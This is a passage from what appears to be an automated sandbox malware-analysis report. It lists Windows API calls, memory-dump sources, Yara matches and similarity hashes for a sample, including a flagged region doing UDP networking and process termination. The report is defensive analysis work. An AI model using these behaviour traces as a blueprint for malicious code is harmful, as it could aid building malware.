                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,?,?,00CC0020), ref: 0043837B
                                    • GlobalFree.KERNEL32(00000000), ref: 00438443
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: FreeGlobalObjectStretch
                                    • String ID: pTL
                                    • API String ID: 3670910119-168633513
                                    • Opcode ID: 2ceb1cfed3efd696ec4a7b34c9b52a26c9caa96cbf92294532a2b3498ea7660c
                                    • Instruction ID: 724965e028ca5e3a9c44f8e84bbc6e75a0332943d9eed8d5142fe3f87e28fff8
                                    • Opcode Fuzzy Hash: 2ceb1cfed3efd696ec4a7b34c9b52a26c9caa96cbf92294532a2b3498ea7660c
                                    • Instruction Fuzzy Hash: 1591E1751083449FC710EF65CD81F6BB7E8EB98704F144A2EF69183281DBB8E909CB5A
                                    APIs
                                    • GetCursorPos.USER32(?), ref: 004111A4
                                    • TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 00411203
                                    • DestroyMenu.USER32(00000000), ref: 0041120A
                                    • SetForegroundWindow.USER32(?), ref: 00411220
                                    • TrackPopupMenu.USER32(00000000,00000008,?,?,00000000,?,00000000), ref: 00411241
                                    • PostMessageA.USER32(?,00000000,00000000,00000000), ref: 00411251
                                    • DestroyMenu.USER32(00000000), ref: 00411258
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Menu$DestroyPopupTrack$CursorForegroundMessagePostWindow
                                    • String ID:
                                    • API String ID: 1044074573-0
                                    • Opcode ID: 8e6ca9d604f1d22b7f80a5c036c9eb6f06f33606f68b240c74a0c5f699d2d609
                                    • Instruction ID: abe6accadc9790e1260eb7b9b4dc92fc5f2cc9135035eb38bb32f51e9aa3c61d
                                    • Opcode Fuzzy Hash: 8e6ca9d604f1d22b7f80a5c036c9eb6f06f33606f68b240c74a0c5f699d2d609
                                    • Instruction Fuzzy Hash: AE61B071604311ABC314DF55DC81FABB3E8FF88308F454A5DFA45A7292D738E9058BAA
                                    APIs
                                    • SetRect.USER32(?,00000000,00000032,00000032,?), ref: 00439639
                                    • OffsetRect.USER32(?,?,?), ref: 00439646
                                    • IntersectRect.USER32(?,?,?), ref: 00439662
                                    • IsRectEmpty.USER32(?), ref: 0043966D
                                    • OffsetRect.USER32(?,?,?), ref: 004396AA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Offset$EmptyIntersect
                                    • String ID: 2
                                    • API String ID: 765610062-450215437
                                    • Opcode ID: 5519f3908d56714601442429ce822fd3928960b76e326834e510c81407ef06de
                                    • Instruction ID: 095237607498ef6161b24400b82b06015235aa3fe0f7356ec96bb117e5e676c2
                                    • Opcode Fuzzy Hash: 5519f3908d56714601442429ce822fd3928960b76e326834e510c81407ef06de
                                    • Instruction Fuzzy Hash: A76111B56083419FD328CF29C88496BBBE9BBC8344F149A2EF58987360D774E905CF56
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$ClientCreateEmptyFill
                                    • String ID: pTL
                                    • API String ID: 97219908-168633513
                                    • Opcode ID: 6135f3a19b95b5175cfa386f2b5285d494609a1d302e3c36b87f1c45aa220766
                                    • Instruction ID: 58a106870cc4c2164096725554725f21b801919612d326af25f06482f5f4f43e
                                    • Opcode Fuzzy Hash: 6135f3a19b95b5175cfa386f2b5285d494609a1d302e3c36b87f1c45aa220766
                                    • Instruction Fuzzy Hash: CF515AB5204202AFD704DF66D884F6BB3E8FF88704F44891EB95683240DB78E905CBA6
                                    APIs
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 02422D58
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 02422DB6
                                    • select.WS2_32(?,00000000,00000000,00000000,00000014), ref: 02422E8E
                                    • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02422EBD
                                    • closesocket.WS2_32(?), ref: 02422F8A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    • Associated: 00000006.00000002.3795163173.0000000002495000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.0000000002498000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.000000000249B000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A0000.00000040.00001000.00020000.00000000.sdmp
                                    • Associated: 00000006.00000002.3795163173.00000000024A9000.00000040.00001000.00020000.00000000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: closesocketrecvfromselectsendtosocket
                                    • String ID: @
                                    • API String ID: 4198204009-2766056989
                                    • Opcode ID: 35fd4f826a3d55576f3e1cb989548a4908a4ca77846155179186993d92332f7f
                                    • Instruction ID: 93a2187a3614b8853da0e1107de64a667c25c0ab97fbb390f21fdf8d3ab5953e
                                    • Opcode Fuzzy Hash: 35fd4f826a3d55576f3e1cb989548a4908a4ca77846155179186993d92332f7f
                                    • Instruction Fuzzy Hash: 6E619F71D042699BDB38CB15CC54BEAB775AF08340F9041DAE79EA6280D7F45AC9DF40
                                    APIs
                                    • socket.WS2_32(00000002,00000002,00000011), ref: 02423339
                                    • sendto.WS2_32(?,?,00000000,00000000,?,00000010), ref: 0242338A
                                    • select.WS2_32(?,00000000,00000000,00000000,0000001E), ref: 02423462
                                    • recvfrom.WS2_32(?,?,00001000,00000000,?,00000010), ref: 02423491
                                    • closesocket.WS2_32(000000FF), ref: 02423521
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: closesocketrecvfromselectsendtosocket
                                    • String ID: @
                                    • API String ID: 4198204009-2766056989
                                    • Opcode ID: 6bd15b9e609f35c4d1bd856ffbe8256716a1e6fa29493330756a9dea09daf975
                                    • Instruction ID: 9fcc002ba9933d3c6c45031b164418b3d5bb131ed5d3b1e3b63b43241d666768
                                    • Opcode Fuzzy Hash: 6bd15b9e609f35c4d1bd856ffbe8256716a1e6fa29493330756a9dea09daf975
                                    • Instruction Fuzzy Hash: 24515C70D042689BEB28CF15CC94BE9BB75AF45304F9081DAE28DA7280DBB45EC9CF40
                                    APIs
                                    • GetParent.USER32(?), ref: 004C00F8
                                    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004C0121
                                    • UpdateWindow.USER32(?), ref: 004C013D
                                    • SendMessageA.USER32(?,00000121,00000000,?), ref: 004C0163
                                    • SendMessageA.USER32(?,0000036A,00000000,00000001), ref: 004C0182
                                    • UpdateWindow.USER32(?), ref: 004C01C5
                                    • PeekMessageA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 004C01F8
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Message$Window$PeekSendUpdate$LongParent
                                    • String ID:
                                    • API String ID: 2853195852-0
                                    APIs
                                      • Part of subcall function 004C608B: __EH_prolog.LIBCMT ref: 004C6090
                                      • Part of subcall function 004C0722: GetWindowLongA.USER32(?,000000F0), ref: 004C072E
                                    • SendMessageA.USER32(?,000001A1,00000000,00000000), ref: 004C49AB
                                    • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 004C49BA
                                    • SendMessageA.USER32(?,0000018E,00000000,00000000), ref: 004C49D3
                                    • SendMessageA.USER32(?,0000018E,00000000,00000000), ref: 004C49FB
                                    • SendMessageA.USER32(?,0000018B,00000000,00000000), ref: 004C4A0A
                                    • SendMessageA.USER32(?,00000198,?,?), ref: 004C4A20
                                    • PtInRect.USER32(?,000000FF,?), ref: 004C4A2C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$H_prologLongRectWindow
                                    • String ID:
                                    • API String ID: 2846605207-0
                                    APIs
                                    • lstrlen.KERNEL32(?,00001A04,?,?,?,?,00411732,0000F000), ref: 004B9F40
                                    • GetFocus.USER32 ref: 004B9F5B
                                      • Part of subcall function 004BE3D0: UnhookWindowsHookEx.USER32(?), ref: 004BE3F5
                                    • IsWindowEnabled.USER32(?), ref: 004B9F84
                                    • EnableWindow.USER32(?,00000000), ref: 004B9F96
                                    • EnableWindow.USER32(?,00000001), ref: 004B9FDF
                                    • IsWindow.USER32(?), ref: 004B9FE5
                                    • SetFocus.USER32(?), ref: 004B9FF3
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$EnableFocus$EnabledHookUnhookWindowslstrlen
                                    • String ID:
                                    • API String ID: 1607871872-0
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 004C6DAB
                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 004C6DCE
                                    • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 004C6DED
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004C6DFD
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 004C6E07
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CloseCreate$Open
                                    • String ID: software
                                    • API String ID: 1740278721-2010147023
                                    APIs
                                    • lstrlen.KERNEL32(00000000), ref: 0242D7E8
                                      • Part of subcall function 024213E8: InterlockedExchange.KERNEL32(024340B8,?), ref: 02421406
                                    • lstrcat.KERNEL32(00000000,024A56EC), ref: 0242D816
                                    • lstrcat.KERNEL32(00000000,024A56F0), ref: 0242D83C
                                    • lstrcat.KERNEL32(00000000,024A56F4), ref: 0242D84B
                                    • lstrlen.KERNEL32(00000000), ref: 0242D8A6
                                    • lstrcat.KERNEL32(00000000,024A56F8), ref: 0242D8DA
                                    • lstrcat.KERNEL32(00000000,024A56FC), ref: 0242D900
                                    • lstrcat.KERNEL32(00000000,024A5700), ref: 0242D91D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcat$lstrlen$ExchangeInterlocked
                                    • String ID:
                                    • API String ID: 3054446656-0
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$ChildFocusVisible
                                    • String ID:
                                    • API String ID: 372613587-0
                                    APIs
                                    • CopyRect.USER32(?,00000000), ref: 00444022
                                    • IsRectEmpty.USER32(?), ref: 00444053
                                    • OffsetRect.USER32(?,00000000,?), ref: 004440A3
                                    • LPtoDP.GDI32(?,?,00000002), ref: 004440D8
                                    • GetClientRect.USER32(?,?), ref: 004440E7
                                    • IntersectRect.USER32(?,?,?), ref: 004440FC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$ClientCopyEmptyIntersectOffset
                                    • String ID:
                                    • API String ID: 1743551499-0
                                    APIs
                                    • GetStringTypeW.KERNEL32(00000001,005ADC8C,00000001,-00000030,00000003,00000000,-00000030,?,00000000,004AAD21,00000000,0042B552,00000000), ref: 004B6437
                                    • GetStringTypeA.KERNEL32(00000000,00000001,005ADC88,00000001,?,?,00000000,004AAD21,00000000,0042B552,00000000), ref: 004B6451
                                    • GetStringTypeA.KERNEL32(-00000030,0042B552,00000000,004AAD21,00000000,00000003,00000000,-00000030,?,00000000,004AAD21,00000000,0042B552,00000000), ref: 004B6485
                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004AAD21,00000000,00000000,00000003,00000000,-00000030,?,00000000,004AAD21,00000000,0042B552,00000000), ref: 004B64BD
                                    • MultiByteToWideChar.KERNEL32(?,00000001,00000000,004AAD21,?,?,?,?,?,?,00000000,004AAD21,00000000,0042B552), ref: 004B6513
                                    • GetStringTypeW.KERNEL32(0042B552,?,00000000,00000000,?,?,?,?,?,?,00000000,004AAD21,00000000,0042B552), ref: 004B6525
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: StringType$ByteCharMultiWide
                                    • String ID:
                                    • API String ID: 3852931651-0
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: wsprintf
                                    • String ID: - $ - [$%d / %d]$?? / %d]
                                    • API String ID: 2111968516-3107364983
                                    APIs
                                    • GetParent.USER32(?), ref: 004C40FA
                                    • GetLastActivePopup.USER32(?), ref: 004C4109
                                    • IsWindowEnabled.USER32(?), ref: 004C411E
                                    • EnableWindow.USER32(?,00000000), ref: 004C4131
                                    • GetWindowLongA.USER32(?,000000F0), ref: 004C4143
                                    • GetParent.USER32(?), ref: 004C4151
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                    • String ID:
                                    • API String ID: 670545878-0
                                    • Opcode ID: 6f7952b9cdcb73e72994df93ba2655a9d367f2f2a1107226bf3fa9820b2e84f9
                                    • Instruction ID: 1a1ea72aaa3a6765ea0ec3a65c28e3ee92f17fedf9c917ca18c55a438640cf10
                                    • Opcode Fuzzy Hash: 6f7952b9cdcb73e72994df93ba2655a9d367f2f2a1107226bf3fa9820b2e84f9
                                    • Instruction Fuzzy Hash: 2311063AA013215786B05E6A5E68F6BB29C9FF4B51F0C012EEE90D3301DF28DC4142AD
                                    APIs
                                    • SendMessageA.USER32(?,0000110A,00000002,?), ref: 0041D64B
                                    • SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0041D65D
                                    • SendMessageA.USER32(?,0000110A,00000002,?), ref: 0041D66B
                                    • SendMessageA.USER32(?,0000110A,00000001,?), ref: 0041D67D
                                    • SendMessageA.USER32(?,00001101,00000000,00000000), ref: 0041D68F
                                    • SendMessageA.USER32(?,0000110A,00000001,?), ref: 0041D69D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID:
                                    • API String ID: 3850602802-0
                                    • Opcode ID: e476edcf7dddb7de31a204316d0147fd6231fe6b1a871442e555a649ade3ba09
                                    • Instruction ID: 3ef9cdafcfc7f0247344fc9dd625f878905ba069611ff15d6de485fc42b6ec75
                                    • Opcode Fuzzy Hash: e476edcf7dddb7de31a204316d0147fd6231fe6b1a871442e555a649ade3ba09
                                    • Instruction Fuzzy Hash: 450186F2B403057EF534DA658CC2FE3A2AD9F98B91F018619B701DB2C0C5E5EC824634
                                    APIs
                                    • GetFocus.USER32 ref: 004C3ACF
                                      • Part of subcall function 004C3971: GetWindowLongA.USER32(00000000,000000F0), ref: 004C3982
                                    • GetParent.USER32(00000000), ref: 004C3AF6
                                      • Part of subcall function 004C3971: GetClassNameA.USER32(00000000,?,0000000A), ref: 004C399D
                                      • Part of subcall function 004C3971: lstrcmpiA.KERNEL32(?,combobox), ref: 004C39AC
                                    • GetWindowLongA.USER32(?,000000F0), ref: 004C3B11
                                    • GetParent.USER32(?), ref: 004C3B1F
                                    • GetDesktopWindow.USER32 ref: 004C3B23
                                    • SendMessageA.USER32(00000000,0000014F,00000000,00000000), ref: 004C3B37
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$LongParent$ClassDesktopFocusMessageNameSendlstrcmpi
                                    • String ID:
                                    • API String ID: 2818563221-0
                                    • Opcode ID: 78e94f2489b24a7183e4f805ee6a82eb8d5b29c62380fa0f64fd1563b640795d
                                    • Instruction ID: 51668d5e6b31f87acd6333edb2282dbc034028a1c5405d93364f37ada7f221c2
                                    • Opcode Fuzzy Hash: 78e94f2489b24a7183e4f805ee6a82eb8d5b29c62380fa0f64fd1563b640795d
                                    • Instruction Fuzzy Hash: C7F0F43D60023133D2E22B285C88F6F61585F81B56F14823EF911A33D1FF28AE0280AD
                                    APIs
                                    • CreateFileA.KERNEL32(024A4034,40000000,00000000,00000000,00000003,00000000,00000000,?,02425353), ref: 02424FBB
                                    • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 02424FD5
                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 02424FEA
                                    • CloseHandle.KERNEL32(00000000), ref: 02424FF4
                                    • WriteFile.KERNEL32(000000FF,000000FF,00000004,00000000,00000000), ref: 0242500C
                                    • CloseHandle.KERNEL32(000000FF), ref: 02425016
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3795163173.0000000002420000.00000040.00001000.00020000.00000000.sdmp, Offset: 02420000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_2420000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                    • String ID:
                                    • API String ID: 2603052737-0
                                    • Opcode ID: cd95e1a2ba38657e92e61d4d1b57dfbc17ecf7d85d3047b444268a2b68b44b7f
                                    • Instruction ID: 07f9757848fd2880e57341dda07b5bbe3fc4f17dc2f75e5d1277d63c29417f60
                                    • Opcode Fuzzy Hash: cd95e1a2ba38657e92e61d4d1b57dfbc17ecf7d85d3047b444268a2b68b44b7f
                                    • Instruction Fuzzy Hash: EA01DBB5E80308FBDB18DBA4EC4AF9E7B78AB48701F508644F616A62C0D7B46654CF54
                                    APIs
                                    • CreateSolidBrush.GDI32(00000000), ref: 0041E68C
                                    • DestroyCursor.USER32(?), ref: 0041E72C
                                    • SendMessageA.USER32(?,000000F7,00000000,?), ref: 0041E7EB
                                    • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0041E806
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$BrushCreateCursorDestroySolid
                                    • String ID: BUTTON
                                    • API String ID: 2198832287-3405671355
                                    • Opcode ID: 4b500c961903431ab952ebba7df95e4599d5e9c578a6704eae1ec08e20a5d207
                                    • Instruction ID: 6893abc22feee638899888de0d07626f40cdfb7c6e7c525cb3e128e4ad7c5235
                                    • Opcode Fuzzy Hash: 4b500c961903431ab952ebba7df95e4599d5e9c578a6704eae1ec08e20a5d207
                                    • Instruction Fuzzy Hash: DF71A4B96007049FD724DF66C880FABB7E5BB94704F54492EF99683380D739E881CB5A
                                    APIs
                                    • CreateSolidBrush.GDI32(00000000), ref: 0041F9AC
                                    • DestroyCursor.USER32(?), ref: 0041FA4C
                                    • SendMessageA.USER32(?,000000F7,00000000,?), ref: 0041FB0B
                                    • SendMessageA.USER32(?,000000F1,00000000,00000000), ref: 0041FB26
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$BrushCreateCursorDestroySolid
                                    • String ID: BUTTON
                                    • API String ID: 2198832287-3405671355
                                    • Opcode ID: 2144e6dded6e0e2210e1147e4f5dffb1658b73849d88bd5ab53fb238cab8a0f2
                                    • Instruction ID: f107a27cf5fb1156ee72db6923a4c32adc2468c2e9ff760063656ccbf7415752
                                    • Opcode Fuzzy Hash: 2144e6dded6e0e2210e1147e4f5dffb1658b73849d88bd5ab53fb238cab8a0f2
                                    • Instruction Fuzzy Hash: 4271A3B5604705AFD724DF65C880FABB7E5BB84710F10492EF58683380D779B88ACB5A
                                    APIs
                                    • GetSysColor.USER32(0000000F), ref: 0041B89C
                                    • DestroyCursor.USER32(?), ref: 0041B8FA
                                    • SendMessageA.USER32(?,000000F7,00000001,?), ref: 0041B99C
                                    • SendMessageA.USER32(?,000000F7,00000000,?), ref: 0041B9CE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend$ColorCursorDestroy
                                    • String ID: BUTTON
                                    • API String ID: 3592366650-3405671355
                                    • Opcode ID: 94c0b98c63bbe1cfb6494bb9270f49ec5de9ab37da9ec8b89c0a3cf4e0c45ce5
                                    • Instruction ID: aa03a3313d5ffff0717839192e824df6e90c60f9e3b256a32b7e702f7132dccc
                                    • Opcode Fuzzy Hash: 94c0b98c63bbe1cfb6494bb9270f49ec5de9ab37da9ec8b89c0a3cf4e0c45ce5
                                    • Instruction Fuzzy Hash: EA6182B56047049FD224EF55C880BABF7E9FB44B10F10891EF59683790DB39E885CB9A
                                    APIs
                                      • Part of subcall function 0042B630: GetCurrentThreadId.KERNEL32 ref: 0042B655
                                      • Part of subcall function 0042B630: IsWindow.USER32(00010444), ref: 0042B671
                                      • Part of subcall function 0042B630: SendMessageA.USER32(00010444,000083E7,?,00000000), ref: 0042B68A
                                      • Part of subcall function 0042B630: ExitProcess.KERNEL32 ref: 0042B69F
                                    • RtlDeleteCriticalSection.NTDLL(005DFE00), ref: 00427C6A
                                      • Part of subcall function 004BE544: __EH_prolog.LIBCMT ref: 004BE549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CriticalCurrentDeleteExitH_prologMessageProcessSectionSendThreadWindow
                                    • String ID: !$#$WdL$jB
                                    • API String ID: 2888814780-1538548938
                                    • Opcode ID: 299b0fdfd5623d895e8ee76ff17395e17f803b77690c47a8899be60f5375e144
                                    • Instruction ID: d6e3c3fb4069586939093f5b01e5eac804de8e77cb082d91d81567cc6e3cc454
                                    • Opcode Fuzzy Hash: 299b0fdfd5623d895e8ee76ff17395e17f803b77690c47a8899be60f5375e144
                                    • Instruction Fuzzy Hash: 5F917D34208782CAD312EF75C4947DABFE4AFA1348F50084EE4D647393DBB96249C7A6
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 0041DE96
                                    • PatBlt.GDI32(?,?,?,?,?,00F00021), ref: 0041DF1D
                                    • GetCurrentObject.GDI32(?,00000006), ref: 0041DFAA
                                    • GetClientRect.USER32(?,?), ref: 0041E01C
                                      • Part of subcall function 004C3056: __EH_prolog.LIBCMT ref: 004C305B
                                      • Part of subcall function 004C3056: EndPaint.USER32(?,?,?,?,004175C3), ref: 004C3078
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologPaintRect$BeginClientClipCurrentEmptyObject
                                    • String ID: pTL
                                    • API String ID: 3717962522-168633513
                                    APIs
                                    • CreateBrushIndirect.GDI32(?), ref: 00422E32
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: BrushCreateIndirect
                                    • String ID: pTL
                                    • API String ID: 2533917330-168633513
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
